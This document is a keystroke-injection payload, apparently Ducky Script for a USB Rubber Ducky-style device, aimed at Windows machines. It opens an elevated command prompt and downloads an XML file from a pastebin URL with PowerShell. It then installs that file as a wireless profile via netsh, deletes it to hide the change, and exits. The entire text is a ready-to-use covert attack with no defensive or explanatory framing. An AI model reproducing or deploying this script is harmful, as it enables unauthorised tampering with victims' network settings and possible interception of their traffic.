ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
LEFTARROW
DELAY 400
ENTER
DELAY 800
ENTER
STRING cd %TEMP%
ENTER
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://pastebin.com/raw.php?i=8WsHSWdZ','%TEMP%\a.xml')
ENTER
DELAY 1000
ENTER
STRING netsh wlan add profile filename="a.xml" interface="Wireless Network Connection"
ENTER
STRING del a.xml
ENTER
STRING exit
ENTER
